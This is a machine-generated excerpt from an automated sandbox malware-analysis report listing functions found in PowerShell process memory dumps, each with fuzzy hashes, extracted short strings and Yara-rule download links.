Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1706f77f6a8f09b00fbfe16bd769b087f36eef529f1a50910f902c2d898df0bd
Instruction ID: 31c87d215f7190a60d88b236b833730763a8d318739c5f9d3ab734840f357946
Opcode Fuzzy Hash: 1706f77f6a8f09b00fbfe16bd769b087f36eef529f1a50910f902c2d898df0bd
Instruction Fuzzy Hash: 49D13AB4A11249EFCB05CFA9D484A9DBBF2EF49310F248599E805AB361C731ED95CF90

Function 042A72A0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78f79d5552cd5d48bec3653a58175b5240449c5f469358ffe1753dcc2bb823d
Instruction ID: 4098238ea666b4365f3b34fa05cda6745ca9d11eea3a34a137318843d4fc293f
Opcode Fuzzy Hash: c78f79d5552cd5d48bec3653a58175b5240449c5f469358ffe1753dcc2bb823d
Instruction Fuzzy Hash: B4C18A35B10209CFCB14DFA8D944A9DBBB2FFC4310F1585A9E806AB265DB34ED59CB84

Function 042AEACD Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1708f6c57b24cffe0c518226f015093616d37a800ef541775a04de5dd89f566d
Instruction ID: 4db614411292c3fc75d6f690bbf2c207313138d128d6edfd9e03e56b0446ad73
Opcode Fuzzy Hash: 1708f6c57b24cffe0c518226f015093616d37a800ef541775a04de5dd89f566d
Instruction Fuzzy Hash: 0DB15B70F2021ADFDB10CFA8C9857DDBBF2BF48314F158529E819A7254EB74A856CB81

Function 042AF39C Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb799f17fdddd7e7bd7eef5593204d6b3d5362f6a857efa088632dac20c3a17a
Instruction ID: ab5847e4368b7b6fcb55900c1111557dfe55f11efe93b5cebce97759fdf5d082
Opcode Fuzzy Hash: eb799f17fdddd7e7bd7eef5593204d6b3d5362f6a857efa088632dac20c3a17a
Instruction Fuzzy Hash: 9DB18F70F2020ADFDB10CFA8CA8579DBBF2AF48754F158529D814E7254EB78A865CB81

Function 042A2AA0 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c0a0a7de040bb5330a90aaa5504e9ba0af05f96b88a976bbb89b22813e1eaf
Instruction ID: 90f7efd8cf541aa5dc85a5d98c61462e059a25ef84dd41fb2272b7ece8108e0c
Opcode Fuzzy Hash: a7c0a0a7de040bb5330a90aaa5504e9ba0af05f96b88a976bbb89b22813e1eaf
Instruction Fuzzy Hash: F1917C74A04605CFCB15CF58C494AAEFBB2FF88310B258699D855AB3A5C735FC51CBA0

Function 042A7A68 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003cdf998e2c760bbd85fd9ad2a2618f34cabcdbbbd4ced0ec14fe895d501ef0
Instruction ID: 72a83814c2b0c6c106dd3327e9d2c10b788636ad1be32683db5c5445bc93e359
Opcode Fuzzy Hash: 003cdf998e2c760bbd85fd9ad2a2618f34cabcdbbbd4ced0ec14fe895d501ef0
Instruction Fuzzy Hash: 64718B70B10209CFCB14DF68C880A9DBBF2BF89314F24896AD8159B261DB75AC56CB94

Function 042A7BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ede943b5bb26195f9785e4350fab6f1c0a51940465614ad03e99f4216eb130
Instruction ID: cebe19e0c54166a65d03785237fde8fd833281ee991647774e9a6da65bf74df0
Opcode Fuzzy Hash: 41ede943b5bb26195f9785e4350fab6f1c0a51940465614ad03e99f4216eb130
Instruction Fuzzy Hash: 50714A71B10209DFDB14DFA5D880BADBBF6BF88304F148569E802AB2A1DB35AD55CB44

Function 042A77F9 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c330804a6512c6fd40f0da98ef1813d2ebda9832ac692cac5184a4cf5f93c22d
Instruction ID: ddb0fe8836e715b4120ebf77634ee5b20a97fdfa4bf0c841c7f8a930000634eb
Opcode Fuzzy Hash: c330804a6512c6fd40f0da98ef1813d2ebda9832ac692cac5184a4cf5f93c22d
Instruction Fuzzy Hash: 47418935B10205DFDB15DB34C854AAA7BF2EFC9354F188468E806EB3A1CB35AD41DB90

Function 071C90F4 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd7b51167eff027e236e528321642239882a88c6162fc7c3b4a1b507d7c7d949
Instruction ID: 28072eb8b89c85f48d882be95b40374472e30fb6c679c4b40ede0532ede69317
Opcode Fuzzy Hash: bd7b51167eff027e236e528321642239882a88c6162fc7c3b4a1b507d7c7d949
Instruction Fuzzy Hash: 184107F1A00202CFDF25CFA48506AA977A2EFA1360F1680ADD9459F2D2D735E940C7A1

Function 042A7A53 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2459204cec9e5d0d55b4a856bcc087f7631752ed0cbc21bca0eaa7be94e7439a
Instruction ID: e9c595e33aaa591aa0cd40be6aa821e4398d039f231178a05976b648e26806b1
Opcode Fuzzy Hash: 2459204cec9e5d0d55b4a856bcc087f7631752ed0cbc21bca0eaa7be94e7439a
Instruction Fuzzy Hash: AE418C70A10209DFDB14DFB9C845BADBBF2BFC8300F148869D402AB2A1DB75AD45CB84

Function 042A2BB0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c134de4b7be817594310afd9c0746de6cd6d9673b098f977a184c479f0601a5
Instruction ID: a35a5c6fd81397c4b714c5b2c096c3b7f57d3cafda32bf5fb12ced852cea4a85
Opcode Fuzzy Hash: 5c134de4b7be817594310afd9c0746de6cd6d9673b098f977a184c479f0601a5
Instruction Fuzzy Hash: E8415A74A10605CFCB05CF58C0949AEFBB6FF48310B1586A9D816AB3A5C736FC50CBA0

Function 071C0DE8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 913c0a2b992a8860b6f3b384642469413204dce508a3a1fac1639b3cebbbddf0
Instruction ID: ff2eccef2485bbfc4aa8b71c16f01cc13f6bae9d344615c61337c43c16394e31
Opcode Fuzzy Hash: 913c0a2b992a8860b6f3b384642469413204dce508a3a1fac1639b3cebbbddf0
Instruction Fuzzy Hash: FB2157B134031ADBCB249AEE8C0173BB78A9BDD314F14842EA646EA2C0CF75C9818361

Function 042ABCA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfda314d5d3cd801c846922f47b2c9654b36ac3718e7e772d798813edfa79860
Instruction ID: 18fe88585c2d3fa8433d3d06077dac57df0cce35caa1ce713d23c67d0e22dcea
Opcode Fuzzy Hash: cfda314d5d3cd801c846922f47b2c9654b36ac3718e7e772d798813edfa79860
Instruction Fuzzy Hash: 3F314F30B011188FCB25DB74C855BEEBBB2AF49344F1044E9D909AB361CB35AE96CF90

Function 071C0DCC Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c9670844040d0a9a187ab36bba19e42897d9adc18c2552c3b0e46ff9c6d505e
Instruction ID: 09c2249f4d3830c40e06285689d3609aaddc1fc1cab8cfc336e0a67351fac514
Opcode Fuzzy Hash: 5c9670844040d0a9a187ab36bba19e42897d9adc18c2552c3b0e46ff9c6d505e
Instruction Fuzzy Hash: B521D0B1344359ABD7218EFA4C017767F965F99300F18802EA644EB2C1CB38DD84C370

Function 042A9580 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91470cedb2d335cabaa233bb727406af90d1c5b87823b73cef0e1051269d555e
Instruction ID: 4b786ab6e7fb97bb14621ef2a53c92dfa26002d15c41a53659ca6c8159848976
Opcode Fuzzy Hash: 91470cedb2d335cabaa233bb727406af90d1c5b87823b73cef0e1051269d555e
Instruction Fuzzy Hash: C8216AB4A042498FCB01CF58D8819AABFB5FF89310B05859AE809EB352C731FD51CBA0

Function 071CCDDA Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8e25a254c2905af18070cc56b668dc4ced99dd4eef155f86449b8a01489839
Instruction ID: 4b7fda1dfdeeb251844bd2f166821c48a37bbed1b8349f2bb50645095ececde7
Opcode Fuzzy Hash: fc8e25a254c2905af18070cc56b668dc4ced99dd4eef155f86449b8a01489839
Instruction Fuzzy Hash: 86018C74B40319CFE760CBA4C951BAAB7B2EB95314F2084A8D5056B381CB77AD85CF91

Non-executed Functions

Function 071C8778 Relevance: 14.2, Strings: 11, Instructions: 486COMMON

Download Yara Rule

Strings

hl, xrefs: 071C885F
tPcq, xrefs: 071C8801
hl, xrefs: 071C886D
$cq, xrefs: 071C878A
hl, xrefs: 071C8D07
tPcq, xrefs: 071C87F5
4'cq, xrefs: 071C89DF
$cq, xrefs: 071C87BC
4'cq, xrefs: 071C89E9
$cq, xrefs: 071C87B0
hl, xrefs: 071C8CF9

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$hl$hl$hl$hl
API String ID: 0-3998453855
Opcode ID: 3a930252bbab1fe71ed0c53d4595c57dc2f297157512ffd5e71053d4b035e3ad
Instruction ID: 7ae8ec4bf4008f6f6a57bfceaffcdbf08c7073453d7fa363d045504c9a50460a
Opcode Fuzzy Hash: 3a930252bbab1fe71ed0c53d4595c57dc2f297157512ffd5e71053d4b035e3ad
Instruction Fuzzy Hash: 06F16CB17002068FCB25DFA988416AABBE6EFE6310F19807ED505CB2D1DB35DD41C7A2

Function 071CD0B8 Relevance: 14.1, Strings: 11, Instructions: 364COMMON

Download Yara Rule

Strings

$cq, xrefs: 071CD1C3
$cq, xrefs: 071CD3C1
$cq, xrefs: 071CD376
$cq, xrefs: 071CD1B3
$cq, xrefs: 071CD3D1
4'cq, xrefs: 071CD3EF
$cq, xrefs: 071CD15E
4'cq, xrefs: 071CD1E4
4'cq, xrefs: 071CD3FB
4'cq, xrefs: 071CD1F0
$cq, xrefs: 071CD4E6

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
API String ID: 0-1449217865
Opcode ID: b81101c94f12ea6e2895ec0ee8fa096b17984f6dc12761ccd8e47eca236f74da
Instruction ID: 0f386fd3e478c8c454061edab48bdd4ccaad55a9e756719f0e2f5090c79d6db2
Opcode Fuzzy Hash: b81101c94f12ea6e2895ec0ee8fa096b17984f6dc12761ccd8e47eca236f74da
Instruction Fuzzy Hash: 18C1E7B071420ADFCF1ADEA9E8046AA77B2BBD5310F15C07ED8858B2C1DB35D991CB91

Function 071C7738 Relevance: 11.7, Strings: 9, Instructions: 424COMMON

Download Yara Rule

Strings

$cq, xrefs: 071C77AB
$cq, xrefs: 071C77DF
4'cq, xrefs: 071C7A98
$cq, xrefs: 071C7B7D
$cq, xrefs: 071C77FB
$cq, xrefs: 071C77EF
$cq, xrefs: 071C77D3
$cq, xrefs: 071C778F
4'cq, xrefs: 071C7AA4

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
API String ID: 0-1695041053
Opcode ID: 7ce3c350f5a540d3bde6f42ad50a4b51126bced1c7f2176af6484ae6b48dfc4e
Instruction ID: 9019d23c9705845268ddeca065480f0e67bc2003540d17279dd89cb7a1960c10
Opcode Fuzzy Hash: 7ce3c350f5a540d3bde6f42ad50a4b51126bced1c7f2176af6484ae6b48dfc4e
Instruction Fuzzy Hash: 65D14DB17143468FCB16DFB8881277A7BA2AFE5210F1980AED505CB2D2DB75C941CBA1

Function 071CE538 Relevance: 11.4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

84pl, xrefs: 071CE732
$cq, xrefs: 071CE5B5
(iq, xrefs: 071CE7AE
(iq, xrefs: 071CE74A
84pl, xrefs: 071CE636
tPcq, xrefs: 071CE689
tPcq, xrefs: 071CE784
(iq, xrefs: 071CE7B8
4'cq, xrefs: 071CE85C

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$84pl$84pl$tPcq$tPcq$$cq$(iq$(iq$(iq
API String ID: 0-3828021816
Opcode ID: f04033cb80e5c5f21db5dc42c0cb443d3e996c7e8a1a66e80c3c343ad0a07312
Instruction ID: e4713ce94de1c04f50fdbe48155b950e0810b59e875e3592ade4061f98803925
Opcode Fuzzy Hash: f04033cb80e5c5f21db5dc42c0cb443d3e996c7e8a1a66e80c3c343ad0a07312
Instruction Fuzzy Hash: 7A61B1F4A10216DFDB25CF98C641B6ABBF6AFA5310F19845DE804AB2D1C731DC88CB91

Function 071CE1D4 Relevance: 10.2, Strings: 8, Instructions: 163COMMON

Download Yara Rule

Strings

TQhq, xrefs: 071CE242
TQhq, xrefs: 071CE3EA
tPcq, xrefs: 071CE356
$cq, xrefs: 071CE414
$cq, xrefs: 071CE263
4'cq, xrefs: 071CE446
$cq, xrefs: 071CE284
84pl, xrefs: 071CE304

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$84pl$TQhq$TQhq$tPcq$$cq$$cq$$cq
API String ID: 0-346273395
Opcode ID: e27cda29b3159f76d962bd0df5414339cc8d90aa60918d014ff1a40eecad08ff
Instruction ID: 05fff6849f33729e37e1eb70d016cbd6bf4aded4e2a02bef9859ac4af078ea5b
Opcode Fuzzy Hash: e27cda29b3159f76d962bd0df5414339cc8d90aa60918d014ff1a40eecad08ff
Instruction Fuzzy Hash: B751E4F1610206DFDB2ACE94C504BAA77B2BF61711F5580AEE8059F2D1C735ED88CB91

Function 071CDC20 Relevance: 8.9, Strings: 7, Instructions: 193COMMON

Download Yara Rule

Strings

$cq, xrefs: 071CDD58
d%iq, xrefs: 071CDE37
84pl, xrefs: 071CDE1F
4'cq, xrefs: 071CDF0F
d%iq, xrefs: 071CDEA5
tPcq, xrefs: 071CDE71
d%iq, xrefs: 071CDE9B

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$84pl$d%iq$d%iq$d%iq$tPcq$$cq
API String ID: 0-10998374
Opcode ID: e73ffeb627a8dbea48c7bd843206b12f6fce96ca8c3be22ae545ccbe47fd3d85
Instruction ID: 6927b9407ee78712f4dfc65a202d31d1ae6fed5c42a56fd6770b3438e5627c70
Opcode Fuzzy Hash: e73ffeb627a8dbea48c7bd843206b12f6fce96ca8c3be22ae545ccbe47fd3d85
Instruction Fuzzy Hash: B96105F0B142059FDB2ACF94D4416B6BBB6AFA5250F1680AEE8819B2D9C731DC41C7A1

Function 071CDC78 Relevance: 8.9, Strings: 7, Instructions: 164COMMON

Download Yara Rule

Strings

$cq, xrefs: 071CDD58
d%iq, xrefs: 071CDE37
84pl, xrefs: 071CDE1F
4'cq, xrefs: 071CDF0F
d%iq, xrefs: 071CDEA5
tPcq, xrefs: 071CDE71
d%iq, xrefs: 071CDE9B

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$84pl$d%iq$d%iq$d%iq$tPcq$$cq
API String ID: 0-10998374
Opcode ID: 5b0a93ef000e6525db2839067b8a06b6afba03818a56fe203fa21b320b086316
Instruction ID: c90627bb76c9cda339a0f92817df11b26f04d41a8877368bbb6fdea3f65ff167
Opcode Fuzzy Hash: 5b0a93ef000e6525db2839067b8a06b6afba03818a56fe203fa21b320b086316
Instruction Fuzzy Hash: 3151C3F0B102059FDB29CF94D5406BABBF6AFA5250F1680ADE8819B2D9C731DD41CB91

Function 071CB3C6 Relevance: 7.9, Strings: 6, Instructions: 403COMMON

Download Yara Rule

Strings

-ck, xrefs: 071CBA3C
4'cq, xrefs: 071CB785
x.ck, xrefs: 071CBA05
4'cq, xrefs: 071CB83F
4'cq, xrefs: 071CB79B
4'cq, xrefs: 071CB829

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$4'cq$4'cq$x.ck$-ck
API String ID: 0-173980018
Opcode ID: 3c260b10ebc9d6c97ff86e8fe56e1f5193cdbbbc00dd90bc4fb7dabefda2d9bd
Instruction ID: 50032f3dc870e4c6f3a9c4c1feb61ceaef933c9c4151225ee471ee885c532be5
Opcode Fuzzy Hash: 3c260b10ebc9d6c97ff86e8fe56e1f5193cdbbbc00dd90bc4fb7dabefda2d9bd
Instruction Fuzzy Hash: 92123FB4A00219DFDB64DF68C951B9ABBB2FB84304F1085D9D5096B381CB76EE81CF91

Function 071CEBDC Relevance: 7.7, Strings: 6, Instructions: 196COMMON

Download Yara Rule

Strings

84pl, xrefs: 071CED3A
4'cq, xrefs: 071CEEC2
tPcq, xrefs: 071CED8A
$cq, xrefs: 071CEC8C
$cq, xrefs: 071CEE4A
$cq, xrefs: 071CEC6B

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$84pl$tPcq$$cq$$cq$$cq
API String ID: 0-3839080207
Opcode ID: 4c3eb344a1eb680de02714ed9dec1b175d372f9e6ae9f38c0f8931bee53e51b6
Instruction ID: e8c97ce74e4e86c20cd4a07279752d09f1aa165bc371955b29884b923209d10e
Opcode Fuzzy Hash: 4c3eb344a1eb680de02714ed9dec1b175d372f9e6ae9f38c0f8931bee53e51b6
Instruction Fuzzy Hash: 056134F062020ADFDB2ACE94C5407BA77B6BF61341F59846EE8006B2D4C735DD88CBA5

Function 071CEBF0 Relevance: 7.7, Strings: 6, Instructions: 185COMMON

Download Yara Rule

Strings

84pl, xrefs: 071CED3A
4'cq, xrefs: 071CEEC2
tPcq, xrefs: 071CED8A
$cq, xrefs: 071CEC8C
$cq, xrefs: 071CEE4A
$cq, xrefs: 071CEC6B

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$84pl$tPcq$$cq$$cq$$cq
API String ID: 0-3839080207
Opcode ID: d063c58fd6e4d4238d7afefc6364b8e1647d0589e3e83ccb760143f16680b0d8
Instruction ID: 076d2f7f093cadfabeb6761960a0e038889975aea020befdb472ec14554b5c7c
Opcode Fuzzy Hash: d063c58fd6e4d4238d7afefc6364b8e1647d0589e3e83ccb760143f16680b0d8
Instruction Fuzzy Hash: 7C6123F061020ADFEB2ACE84C540BBA77B6BF65351F59846DE8006B2D4C731DD98CBA5

Function 071CDDBE Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

d%iq, xrefs: 071CDE37
84pl, xrefs: 071CDE1F
4'cq, xrefs: 071CDF0F
d%iq, xrefs: 071CDEA5
tPcq, xrefs: 071CDE71
d%iq, xrefs: 071CDE9B

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$84pl$d%iq$d%iq$d%iq$tPcq
API String ID: 0-1937886691
Opcode ID: e99c8674f887e7255425143dc3b760021dd5b832d1cd17b3778bc2e892c856de
Instruction ID: 2a3582129ff988bbceba7839c80c23aeafc9a8205aa93046ed60868ba6e59138
Opcode Fuzzy Hash: e99c8674f887e7255425143dc3b760021dd5b832d1cd17b3778bc2e892c856de
Instruction Fuzzy Hash: F031B3B0B00215DFCB29DF98D451A6AFBF2BBA8710F15816DE845AB385C731DC01CB91

Function 071C0470 Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

$cq, xrefs: 071C04FC
$cq, xrefs: 071C0535
$cq, xrefs: 071C0541
4'cq, xrefs: 071C056A
4'cq, xrefs: 071C055E

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$$cq$$cq$$cq
API String ID: 0-838516036
Opcode ID: 41d81b80ca8c7b9c42d9d3a5321dc3d96e5912e21c89ce7451361aff689450d2
Instruction ID: f1a640e8c0e031591420f18a2fab7b34707f093d139c263b48e29447ac021321
Opcode Fuzzy Hash: 41d81b80ca8c7b9c42d9d3a5321dc3d96e5912e21c89ce7451361aff689450d2
Instruction Fuzzy Hash: 3D4104B1B14356DFCB269FB48C116AB7BB29FDA210F05446EDA018B2D1DB36C941C7A2

Function 071CEFA4 Relevance: 6.4, Strings: 5, Instructions: 124COMMON

Download Yara Rule

Strings

$cq, xrefs: 071CF035
tPcq, xrefs: 071CF0BC
84pl, xrefs: 071CF067
XRhq, xrefs: 071CF019
XRhq, xrefs: 071CF14D

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 84pl$XRhq$XRhq$tPcq$$cq
API String ID: 0-2137930300
Opcode ID: eca0aed36ab8b00252858dfc761403f2279f9c8d292e6b527db00069e6ea53bd
Instruction ID: b63a3de7497ff7c1895539e39075be5f3a1237e85c47a1292a8774f8318b361c
Opcode Fuzzy Hash: eca0aed36ab8b00252858dfc761403f2279f9c8d292e6b527db00069e6ea53bd
Instruction Fuzzy Hash: 5541D4B2A00206DFDB29CF98C144AAAB7FBAF55710F1AC09ED4046B2D5C731DD42CB51

Function 071CEFB8 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

$cq, xrefs: 071CF035
tPcq, xrefs: 071CF0BC
84pl, xrefs: 071CF067
XRhq, xrefs: 071CF019
XRhq, xrefs: 071CF14D

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 84pl$XRhq$XRhq$tPcq$$cq
API String ID: 0-2137930300
Opcode ID: a4ac553c902a24db9a0396593c8fffa0f060524c8a1aad2627ea73f3fed417ae
Instruction ID: 2e98db38ed2a98f34ae24d0d1fe15141e131e5931b15ac4761ac7fd1a7cdbcbc
Opcode Fuzzy Hash: a4ac553c902a24db9a0396593c8fffa0f060524c8a1aad2627ea73f3fed417ae
Instruction Fuzzy Hash: B241D4B2A00206DBDB25CF88C144AAAB7FBAF58B10F1AC09DD4156B2D4C731DD42CB50

Function 071CA470 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

hl, xrefs: 071CA4FB
$cq, xrefs: 071CA4B6
$cq, xrefs: 071CA47F
$cq, xrefs: 071CA4AA
hl, xrefs: 071CA4ED

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $cq$$cq$$cq$hl$hl
API String ID: 0-190700548
Opcode ID: 6cadfa7538392f6876e40562aa9642728887b4a3da863724426078a8d81780d7
Instruction ID: 7123c2e0c170b028b04adbada759b2e6bf2b53913b183568992a8f2b94387bc5
Opcode Fuzzy Hash: 6cadfa7538392f6876e40562aa9642728887b4a3da863724426078a8d81780d7
Instruction Fuzzy Hash: 8711ECB571031E9BDB37D99AE808727B796AFE1720F2CC02EE5498A2C1DB75C841C361

Function 071CD588 Relevance: 5.5, Strings: 4, Instructions: 483COMMON

Download Yara Rule

Strings

(ocq, xrefs: 071CD9B1
